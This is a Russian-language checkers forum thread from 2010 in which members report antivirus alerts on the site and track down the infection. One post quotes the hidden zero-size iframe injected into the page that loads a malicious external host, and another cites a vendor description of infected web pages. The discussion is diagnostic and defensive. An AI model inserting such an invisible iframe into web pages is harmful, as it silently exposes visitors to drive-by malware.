Google
 

Сайт Андрея Иванова

Андрей Иванов - все секреты шашек и шашистов

Login





 


 Забыли пароль?
 или новый пользователь? Зарегистрируйся!

Кто с нами

Пользователей:  На сайте
Пользователей:  Пользователей: 0
Гостей:  Гостей: 6
Всего:  Всего: 6
Пользователей:  Зарегистрированные
No members connected


Новая тема   Ответить
Предыдущая тема Версия для печати Войти и проверить личные сообщения Следующая тема
Автор Сообщение
Symix
Тема сообщения:   СообщениеОтправлено: Янв 08, 2010 - 02:21 AM



Зарегистрирован: Мар 11, 2004
Сообщений: 2097
Откуда : Hollywood, Florida
Зaшел на shashki.com
Мой avasр на одном компютере бьет тревогу
Win32:Rootkit-gen [Rtk] Malware
потом сайт захотел инстoлать програму из Индии

CA (Computer Associates) не показывает проблем.

Публичный компютер в клубе пускает на сайт но обьявляет вирусу на любом линке форума.
 
 Профиль пользователя отправить личное сообщение WWW  
Ответить с цитатой Наверх
Symix
Тема сообщения:   СообщениеОтправлено: Янв 08, 2010 - 05:23 AM



Зарегистрирован: Мар 11, 2004
Сообщений: 2097
Откуда : Hollywood, Florida
Специально поехал в клуб проверять. Не знаю какой там антивирус. На этот топик допустила, на Задачки от Бужинского нет. Говорит "identity theft" - но это она всегда говорит о сайте shashki.com. Но вот послать ответ оттуда не смог, сайт отказал.
 
 Профиль пользователя отправить личное сообщение WWW  
Ответить с цитатой Наверх
Fenix
Тема сообщения:   СообщениеОтправлено: Янв 08, 2010 - 06:42 AM



Зарегистрирован: Сен 01, 2002
Сообщений: 8715

Забавно.
А у меня просто Опера сама закрывается.

_________________
love is an answer
 
 Профиль пользователя отправить личное сообщение Послать e-mail  
Ответить с цитатой Наверх
A.Presman
Тема сообщения:   СообщениеОтправлено: Янв 08, 2010 - 08:26 AM



Зарегистрирован: Авг 31, 2002
Сообщений: 537

Касперский говорит.

detected: Trojan program Trojan-Downloader.Java.OpenStream.af file: http://generatorwand.cn//0.icq/myf/y/LoaderX.class

Когда он это сказал я посмотрел сурс странички. А там скрытый iframe.

Код:

<iframe src="http://generatorwand.cn//index.php?s=b49f084d83d6446674ea76bf78e8c9dc" width="0" height="0" frameborder="0"></iframe>


Это он.
 
 Профиль пользователя отправить личное сообщение ICQ 
Ответить с цитатой Наверх
AlexanderS
Тема сообщения: Re: Вирус на сайте.  СообщениеОтправлено: Янв 08, 2010 - 09:44 AM



Зарегистрирован: Авг 29, 2002
Сообщений: 845
Откуда : Якутск
Старенький вирус, странно что касперкий его не видит. Судя по всему Ваша локальная машинка уже тоже заражена, последователями, так что перед тем как выкачивать содержимое и пытаться лечить проверьте себя всем возможным...
Что касается PNphpBB2 - ни разу с ним не сталкивался, но он вроде как динамичный, может в каком-то статическом шаблоне вирь прописался...

Virus: HTML/Infected.WebPage.Gen
Date discovered: 14/08/2007
Type: Trojan
In the wild: Yes
Reported Infections: Low
Distribution Potential: Low
Damage Potential: Low
Static file: No
Engine version: 7.04.01.62

Description:
A common attack against the web infrastructure can be the infection of harmless web pages. Some malware changes every HTML file stored on the disc and adds a link (very often an IFrame) to a site hosting malicious code. Other attacks can aim for the web servers and try to insert forwarding to the pages hosted there. The owner of these pages is advised to take them offline. Fix the hole (either on his own PC or on the server), check the pages for infections, clean them and go online again. Infected Web Pages often contain additional Iframe, Object or Script Tags. The Script Tags often contain encrypted Code.
 
 Профиль пользователя отправить личное сообщение WWW ICQ 
Ответить с цитатой Наверх
AlexanderS
Тема сообщения:   СообщениеОтправлено: Янв 08, 2010 - 02:11 PM



Зарегистрирован: Авг 29, 2002
Сообщений: 845
Откуда : Якутск
Alkand писал(а):
Вот же... просмотрел самую первую строку с ифрэймом Rolling Eyes привык, что вирусы дописывают себя в конец файла.
Вроде теперь должно быть чисто. Просто совпало, что сразу два (надеюсь, не больше) вируса залезло...


На страницы форума антивирус больше не ругается, но главная страница и любой article - все равно вылазит тот же вирус. Хотя после лечения IE уже открывает страницы
 
 Профиль пользователя отправить личное сообщение WWW ICQ 
Ответить с цитатой Наверх
AlexanderS
Тема сообщения:   СообщениеОтправлено: Янв 08, 2010 - 02:15 PM



Зарегистрирован: Авг 29, 2002
Сообщений: 845
Откуда : Якутск
AlexanderS писал(а):

На страницы форума антивирус больше не ругается

Уточнение - не на все страницы форума ругается. Вот на этот топик не ругается, а на соседние по ссылке с главной
http://www.shashki.com/PNphpBB2-viewtopic-t-1222.html
http://www.shashki.com/PNphpBB2-viewtopic-t-1399.html
уже ругается...
 
 Профиль пользователя отправить личное сообщение WWW ICQ 
Ответить с цитатой Наверх
Alkand
Тема сообщения:   СообщениеОтправлено: Янв 08, 2010 - 06:28 PM



Зарегистрирован: Июль 16, 2002
Сообщений: 3653
Откуда : Москва
Спасибо всем за помощь. Вроде все почисттил и поменял пароли.
Заодно проапдейтил лицензию каспера с 7 версии на 10-ую. Оказывается это бесплатно Embarassed

_________________
Aurora Borealis - единственный инструментарий для истинных профессионалов Smile
 
 Профиль пользователя отправить личное сообщение Послать e-mail WWW  
Ответить с цитатой Наверх
AlexanderS
Тема сообщения:   СообщениеОтправлено: Янв 08, 2010 - 08:06 PM



Зарегистрирован: Авг 29, 2002
Сообщений: 845
Откуда : Якутск
Alkand писал(а):
Спасибо всем за помощь. Вроде все почисттил и поменял пароли.
Заодно проапдейтил лицензию каспера с 7 версии на 10-ую. Оказывается это бесплатно Embarassed


Не-а :( Все равно вылазит. Не на всех, но на большинстве страниц. Кэш на всякий случай очистил так что уверен что тянется с сайта...
 
 Профиль пользователя отправить личное сообщение WWW ICQ 
Ответить с цитатой Наверх
ALGIMANTAS
Тема сообщения:   СообщениеОтправлено: Янв 08, 2010 - 10:31 PM



Зарегистрирован: Авг 27, 2002
Сообщений: 5766

По моему, "вирус" и в добавлений комментариев к текстам на новостной ленте..
Хотел добавить комментарий к теме на новостной ленте о чекерсе. Три раза пробовал - "не проходит". Если это только для "профессоров", простите, не надо. Никто, кроме нескольких фанатиков, не будет затруднять себя.
г.Александру - сотрите там мои неудачные попытки. Из - за уважения к dammen (этот коллега заметный на этом Форуме), короткий свой ответ ему даю здесь (извиняюсь перед г.Александром за off top):

To dammen:
Да, из WCDF на GA FMJD в Берлине никого не было.
Отчет (или «отчет» в ¼ страницы) WCDF можно найти на сайте FMJD:
http://www.fmjd.nl/news.php?nid=480
Отчетов на GA FMJD в Берлине никто не читал (по моему, сделано правильно), так как их заранее можно было прочитать в Интернете, на странице FMJD, они также были направлены и национальным федерациям. По ним можно было задать вопросы, выступить с репликами.
Но по вопросам чекерса, если и было желающих что то спрашивать, не было к кому обращаться…На GA чекерс все таки несколько раз упоминался в разных контекстах.
Algimantas Kačiuška
 
 Профиль пользователя отправить личное сообщение  
Ответить с цитатой Наверх
dammen
Тема сообщения:   СообщениеОтправлено: Янв 08, 2010 - 11:15 PM



Зарегистрирован: Июнь 19, 2008
Сообщений: 240

ALGIMANTAS писал(а):

To dammen:
Да, из WCDF на GA FMJD в Берлине никого не было.
Отчет (или «отчет» в ¼ страницы) WCDF можно найти на сайте FMJD:
http://www.fmjd.nl/news.php?nid=480
Отчетов на GA FMJD в Берлине никто не читал (по моему, сделано правильно), так как их заранее можно было прочитать в Интернете, на странице FMJD, они также были направлены и национальным федерациям. По ним можно было задать вопросы, выступить с репликами.
Но по вопросам чекерса, если и было желающих что то спрашивать, не было к кому обращаться…На GA чекерс все таки несколько раз упоминался в разных контекстах.
Algimantas Kačiuška

Благодарю Вас за ответ, господин ALGIMANTAS!
С этим отчётом я ознакомился до ГА, а отсутствие официальных лиц от WCDF вероятно, объясняется неизвестными нам вескими причинами. Надеюсь, alemo внесёт ясность в вопросах взаимоотношений WCDF и FMJD, календаря WCDF-2010 и турнира претендентов в Ирландии.
 
 Профиль пользователя отправить личное сообщение  
Ответить с цитатой Наверх
uvf25
Тема сообщения:   СообщениеОтправлено: Янв 09, 2010 - 05:24 AM



Зарегистрирован: Окт 27, 2006
Сообщений: 75

Мой "Касперский" уже третий день обнаруживает и нейтрализует на главной странице при первом входе:

09.01.2010 10:20:52 Обнаружено: Trojan.Win32.Fregee.a Ujjgnlsuw Tszqovwfmgjegjwzc C:\TEMP\8E.tmp

Затем всё работает нормально.
 
 Профиль пользователя отправить личное сообщение Послать e-mail  
Ответить с цитатой Наверх
Натуля
Тема сообщения:   СообщениеОтправлено: Янв 10, 2010 - 09:59 AM



Зарегистрирован: Май 24, 2004
Сообщений: 161

опять этот уродец Evil or Very Mad
 
 Профиль пользователя отправить личное сообщение WWW  
Ответить с цитатой Наверх
Натуля
Тема сообщения:   СообщениеОтправлено: Янв 10, 2010 - 10:02 AM



Зарегистрирован: Май 24, 2004
Сообщений: 161

троянская программа Trojan.Win32.Fregee.a
вылез в теме ЧМ по 100 в Берлине
ps опять принудительный перезагруз(((((( стока всего открыто нужного)))
 
 Профиль пользователя отправить личное сообщение WWW  
Ответить с цитатой Наверх
berg
Тема сообщения:   СообщениеОтправлено: Янв 10, 2010 - 07:38 PM



Зарегистрирован: Сен 21, 2005
Сообщений: 353
Откуда : Минск
Доктор сказал:"C:\Documents and Settings\G....o\Local Settings\Temporary Internet Files\Content.IE5\8RNTSG08\Dtp1NZuedRL2cE34[1].pdf\data001 - инфицирован JS.DownLoader.85"
Два дня назад был другой.
Александр Борисович, это похоже на наезд Evil or Very Mad
 
 Профиль пользователя отправить личное сообщение  
Ответить с цитатой Наверх
Показать:     
Перейти к:  
Время в формате GMT + 3
Новая тема   Ответить
Предыдущая тема Версия для печати Войти и проверить личные сообщения Следующая тема
PNphpBB2 © 2003-2007 
 
Page created in 0.64948010444641 seconds.